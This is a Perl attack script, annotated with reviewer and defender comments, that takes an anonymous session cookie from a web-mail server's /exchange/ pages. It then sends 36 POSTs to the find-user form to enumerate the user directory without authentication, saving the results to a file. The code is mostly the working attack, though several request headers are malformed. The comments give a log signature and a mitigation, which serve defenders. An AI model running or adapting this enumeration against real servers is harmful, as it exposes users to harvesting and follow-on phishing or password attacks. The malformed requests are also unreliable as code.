#!/usr/bin/perl 
use IO::Socket;

# Purpose (as the code reads): connect to <host> on TCP/80, request
# /exchange/root.asp?acs=anon, record the Set-Cookie value from the reply,
# then send one POST to /exchange/finduser/fumsg.asp per character in
# @alphabet (form field DN=<char>) and append every response line to <outfile>.
# This appears to be a directory/user-listing probe against a web-mail
# "find user" form that answers unauthenticated sessions -- inferred from the
# request paths only; confirm against the advisory this script accompanied.
#
# Defender notes:
#   * Log signature: a single client fetching root.asp?acs=anon and then
#     issuing a run of 36 POSTs (one per @alphabet entry) to
#     /exchange/finduser/fumsg.asp over separate short-lived connections.
#   * Mitigation: do not expose the find-user form to anonymous sessions;
#     require authentication for /exchange/ or restrict it by source address.
#
# Code-quality notes: the file has no `use strict` / `use warnings`, so
# $results, $cookie, @alphabet and $char are package globals.

# Requires two arguments: $#ARGV is the last index, so "< 1" means fewer than 2.
if($#ARGV < 1) { die "Heh Usage: $0 <host> <outfile>"; }
# Append-mode output file. NOTE(review): this is a 2-arg open with the
# command-line value interpolated into the mode string and a bareword handle;
# the 3-arg form with a lexical handle keeps the filename from being parsed as
# part of the mode. `!$` in the message looks like a typo for `$!` -- confirm.
open(OUT, ">>$ARGV[1]") || die "Can't open $ARGV[1]: !$\n";

  # CRLF CRLF: the blank line that terminates an HTTP request header block.
  my $eof = "\015\012" x 2;                                     # same shit setting up target, port timeout
  # Indirect-object constructor call; Timeout => 2 is the connect timeout.
  my $sock = new IO::Socket::INET( PeerAddr => $ARGV[0],
                                   PeerPort => 80,
                                   Timeout => 2,
                                   Proto => 'tcp');

  # $results is assigned here and never read anywhere in this file; a failed
  # connect does not stop the script, which continues into the read loop below.
  if (!$sock) { $results = "port closed"; }             
  else {                                                        
  print "Getting..\n";
  print $sock "GET /exchange/root.asp?acs=anon HTTP/1.1\015\012Host: $ARGV[0]" . $eof;
  }

  # NOTE(review): the indentation is misleading. The `};` after the while loop
  # closes the loop, not this eval; the eval is closed by the final `}` of the
  # file. The foreach further down is therefore inside this eval, and a die
  # raised here (including the ALRM handler) skips it as well. $@ is never
  # inspected, so such a failure is silent.
  eval {                                                        # eval + SIGALRM guard; the alarm below is 100 s, not 15
    local $SIG{ALRM} = sub { die "Timed Out" };
    # The alarm is never cancelled with alarm(0) after the loop.
    alarm(100);

    # Echo the response to STDOUT line by line while looking for a cookie.
    while (<$sock>) {
	print $_;
      # Non-greedy capture up to the first ';'. The leading space after the
      # colon is part of $1. $cookie is overwritten on every matching line.
      if ($_ =~ m/^Set-Cookie:(.*?);/) {
         $cookie = $1;
         if ($cookie) {
            # Two follow-up requests are written on the same socket, carrying
            # the captured cookie; their replies are read by this same loop.
  	    print $sock "GET /exchange/logonfrm.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Cookie: $cookie" . $eof;
	    print $sock "GET /exchange/root.asp?acs=anon HTTP/1.1\015\012Host $ARGV[0]\015\012Cookie: $cookie" . $eof;
  	 }
 
      }
  };


  # 36 single-character values: a-z, then 1-9, then 0.
  @alphabet = qw(a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0);

  # One fresh TCP connection and one POST per character.
  foreach $char (@alphabet) {
       # Shadows the outer $eof; this inner copy is not used in the loop body.
       my $eof = "\015\012" x 2;  
       my $newsock = new IO::Socket::INET( PeerAddr => $ARGV[0],
       		                           PeerPort => 80,
                	                   Timeout => 2,
                	                   Proto => 'tcp');
   # As above, $results is write-only and a failed connect is not fatal.
   if (!$newsock) { $results = "port closed"; }
    else {
      # The request is sent to the server, then the same text (without the
      # trailing CRLF CRLF) is echoed to STDOUT for the operator.
      print $newsock "POST /exchange/finduser/fumsg.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Accept: \*\/\*015\012Content-Type: application/x-www-form-urlencoded015\012Content-Length: 44\015\012Cookie: $cookie\015\012 DN=$char&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=\015\012\015\012";
      print "POST /exchange/finduser/fumsg.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Accept: \*\/\*015\012Content-Type: application/x-www-form-urlencoded015\012Content-Length: 44\015\012Cookie: $cookie\015\012 DN=$char&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=" 
    }

  # Per-connection guard: a timeout here aborts only this iteration's read,
  # because this inner eval catches the handler's die.
  eval {                                                        # eval + SIGALRM guard; the alarm below is 100 s, not 15
    local $SIG{ALRM} = sub { die "Timed Out" };
    alarm(100);

    # Copy every response line to STDOUT and to the append-mode output file.
    # The response is stored raw; nothing is parsed or filtered here.
    while (<$newsock>) {
        print $_;
	print OUT $_;
         }

      }
  };
}

